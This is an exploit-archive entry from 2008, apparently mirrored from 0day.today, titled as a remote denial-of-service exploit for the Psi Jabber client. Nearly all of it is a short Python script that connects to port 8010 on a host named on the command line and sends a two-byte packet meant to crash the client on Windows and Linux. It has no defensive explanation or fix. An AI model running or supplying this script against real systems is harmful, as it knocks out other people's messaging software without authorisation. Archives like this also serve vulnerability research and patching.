id: 6692
date: 12/23/2008
title: Psi Jabber Client (8010/tcp) Remote Denial of Service Exploit (win/lin)
author: Sha0
cves: 

=======================================================================
Psi Jabber Client (8010/tcp) Remote Denial of Service Exploit (win/lin)
=======================================================================




#!/usr/bin/python
#psi jabber client 8010/tcp remote denial of service (win & lin)
#by sha0[at]badchecksum.net
#http://jolmos.blogspot.com

import socket, sys

sock = socket.socket(socket.AF_INET,socket.SOCK_STREAM)
try:
    sock.connect((sys.argv[1],8010))
except:
    print 'Cannot connect!'
    sys.exit(1)

try:
    sock.send('\x05\xff')
    print 'Crashed!'
except:
    print 'Cannot send!'

sock.close() 



#  0day.today [2023-03-26]  #